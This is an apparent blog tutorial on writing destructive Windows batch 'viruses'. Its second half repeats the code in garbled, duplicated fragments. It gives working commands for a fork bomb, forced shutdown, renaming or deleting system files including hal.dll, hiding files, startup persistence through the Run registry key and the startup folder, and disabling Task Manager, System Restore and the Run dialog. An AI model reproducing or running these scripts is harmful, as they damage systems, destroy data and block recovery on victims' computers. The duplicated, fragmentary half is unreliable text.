HOW TO CREATE A VIRUS .... SIMPLE
Batch virus is simply made using notepad/notepad++ there is no need for any special program that you need in order for you to make one.Batch file is a command that is executed by the computer line by line (just like C or java, etc.), but batch language is easier to understand than C. Batch is very fast, lets say that you made a batch virus that infects files..It can infect a thousand files in just 5 seconds.
INDEX:
- echo,message review
- memory dump virus
- force shutdown
- file infecting
- file moving
- file copying
- file deleting
- file hiding
- task killing virus
- launch virus every startup
- swap left click and right click mouse buttons
- disabling system restore
- disabling task manager
- disabling folder options
- disabling run
- disabling right click on desktop
So let's begin by constructing a batch file, this is not a virus yet, it will just print a message.
@echo off
echo "im a virus programmer"
pause
type this code on your notepad then save it as .bat extension then launch it on your computer.
@echo off - this will not display the directory.
echo - use to print strings.
pause - waits for the user to press any key before exiting.
now another way of displaying a message is this:
@echo off
msg * im a virus programmer
this will show an alert.
msg * - used to display an alert message.
--------------------------------------------------------------------------------------------------------------
So first lets begin by constructing a batch file that will dump your memory, causing you computer to crash
@echo off
:a
start %0
goto :a
this will loop and loop infinitely, opening a bunch of command prompts, this will cause a memory dump,your computer will surely slow down. The only solution for this memory dump is to restart your computer using the power button,restart button on your system unit.
now lets make a batch file that forcely shutdown a computer:
@echo off
shutdown -s -f -t 30 -c "your owned!"
shutdown - a command use to begin with a shutdown execution.
-s - means shutdown the computer, you can also use -r - this will restart he computer.
-f - forcely terminates running program.
-t - use to set time
30 - number of seconds before shutdown
-c - comment
now lets create a virus that infects file.
@echo off
ren "C:\windows\notepad.exe" "infected.exe"
or
ren "C:\windows\*.exe" "*.bat"
this will change the working notepad.exe to a crappy file infected.exe.
ren - rename, use rename files
"C:\windows\notepad.exe" - the directory of the file that you want to infect.
"infected.exe" - the name of the file that you want to be replaced to the original file.
task killing batch file
@echo off
taskkill /f /im explorer.exe
this will forcely terminate running program on your system.
taskkill - use to terminate a process
/f - forcely termination of the process
im - this specifies the image name, specifies a process.
explorer.exe - the image, the process that you wanted to terminate.
now let's make a batch file that delete files
@echo off
del "C:\windows\notepad.exe" /q
del - the command for deleting files, you can also use 'erase' or 'delete', del is the shortcut for delete
/q - means dont prompt user,silent mode,just delete the file.
c:\windows\notepad.exe - the directory of the file,notepad .exe is the file that we want to delete
moving files - this will move file/s to one place to another
@echo off
move /y file.bat "C:\windows\system32"
move - the command for moving file/s
/y - if the file already exist, don't prompt the user if he want to overwrite
C:\windows\system32 - destination
copying file/s
@echo off
copy /y file.bat "c:\windows\system32"
copy - command for copying file/s
/y - if the file already exist, don't prompt the user if he want to overwrite
C:\windows\system32 - destination
hiding files - this is use of you want to apply hide attribute to a certain file/s
@echo off
attrib +h "c:\windows\notepad.exe"
attrib - attribute
+h - use to hide a file, -h if you want to unhide a file
c:\windows\notepad.exe - the destination of the file we want to hide,notepad.exe is the target file
-------------------------------------------------------------------------------------------------------------
Now let's make a batch file that always launch when windows starts(i love it)
now there are two ways on how will you make your batch file runs at start up, one is creating a registry key, and two is copying the file at startup folder then hiding it so that it will not appear when the user checks the startup folder.
now lets create a registry key that will launch your batch file on start up
@echo off
copy file.bat "C:\windows\system32"
attrib +h "C:\windows\system32\file.bat"
reg add hklm\software\microsoft\windows\currentversion\run /v filedotbat /t reg_sz /d C:\windows\system32\file.bat /f
now this will first copy it self on system32 folder,hide it self then it will make a registry key that will make it start during windows start up.
/v - use to specify a file name
/t - type of registry key
/d - the destination of the file
/f - force to create a registry key
another way is copying the file on the startup folder,this is easier
@echo off
copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup"
attrib +h copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup\file.bat"
now let's create a batch file that will switch right click and left click
@echo off
rundll32 user32.dll, SwapMouseButton
--------------------------------------------------------------------------------------------------------------
now lets create batch file that will disable vital functions of the system
DISABLING TASKMANAGER
@echo off
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
DISABLING SYSTEM RESTORE
@echo off
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f
DISABLING FOLDER OPTIONS
@echo off
REG add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” /v NoFolderOptions /t REG_DWORD /d 1 /f
DISABLING RUN
@echo off
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
DISABLING RIGHT CLICK ON DESKTOP
@echo off
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
--------------------------------------------------------------------------------------------------------------
a good virus must work even if the operating system is installed on other drive, because the common drive that is OS is installed is on drive C, so in case the OS is installed in D,E,F,G,H...Z, will your virus work?
of course in some cases your virus will not work unless your codes are specified for a certain drive.
example:
@echo off
del "C:\windows\system32\hal.dll" /q
now your batch file will search for the file called hal.dll, but first it needs to pass roads,highways..but what will happen if the roads are changed and the highways are also change? the batch file will be confused and will be lost in no where, so to solve this problem we use the '%systemdrive%' - this is a substitute for system drives, in case we do not know where is the operating system is installed,so the code for this would be:
@echo off
del "%systemdrive%\windows\system32\hal.dll"
now your virus will not be confused anymore, since you have placed %systemdrive% telling that 'okay i dont know where is the operating system is installed,so it is up to you now to find our target' then the virus would say 'roger that!'. Now it doesn't matter anymore if the operating system is installed in C or not..If the batch file didn't saw drive C then it will jump to D, then if it didn't found D, it will go to E - Z
if you already mastered this tutorial, please do not share this knowledge to others, it is forbidden.
- memory dump virus
- force shutdown
- file infecting
- file moving
- file copying
- file deleting
- file hiding
- task killing virus
- launch virus every startup
- swap left click and right click mouse buttons
- disabling system restore
- disabling task manager
- disabling folder options
- disabling run
- disabling right click on desktop
echo "im a virus programmer"
pause
@echo off - this will not display the directory.
echo - use to print strings.
pause - waits for the user to press any key before exiting.
msg * im a virus programmer
msg * - used to display an alert message.
--------------------------------------------------------------------------------------------------------------
:a
start %0
goto :a
shutdown -s -f -t 30 -c "your owned!"
-s - means shutdown the computer, you can also use -r - this will restart he computer.
-f - forcely terminates running program.
-t - use to set time
30 - number of seconds before shutdown
-c - comment
ren "C:\windows\notepad.exe" "infected.exe"
ren - rename, use rename files
"C:\windows\notepad.exe" - the directory of the file that you want to infect.
"infected.exe" - the name of the file that you want to be replaced to the original file.
taskkill /f /im explorer.exe
taskkill - use to terminate a process
/f - forcely termination of the process
im - this specifies the image name, specifies a process.
explorer.exe - the image, the process that you wanted to terminate.
del "C:\windows\notepad.exe" /q
/q - means dont prompt user,silent mode,just delete the file.
c:\windows\notepad.exe - the directory of the file,notepad .exe is the file that we want to delete
move /y file.bat "C:\windows\system32"
/y - if the file already exist, don't prompt the user if he want to overwrite
C:\windows\system32 - destination
copy /y file.bat "c:\windows\system32"
/y - if the file already exist, don't prompt the user if he want to overwrite
C:\windows\system32 - destination
attrib +h "c:\windows\notepad.exe"
+h - use to hide a file, -h if you want to unhide a file
c:\windows\notepad.exe - the destination of the file we want to hide,notepad.exe is the target file
-------------------------------------------------------------------------------------------------------------
attrib +h "C:\windows\system32\file.bat"
/t - type of registry key
/d - the destination of the file
/f - force to create a registry key
copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup"
attrib +h copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup\file.bat"
rundll32 user32.dll, SwapMouseButton
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f
REG add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” /v NoFolderOptions /t REG_DWORD /d 1 /f
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
--------------------------------------------------------------------------------------------------------------
of course in some cases your virus will not work unless your codes are specified for a certain drive.
del "C:\windows\system32\hal.dll" /q
del "%systemdrive%\windows\system32\hal.dll"
good tipp
ReplyDelete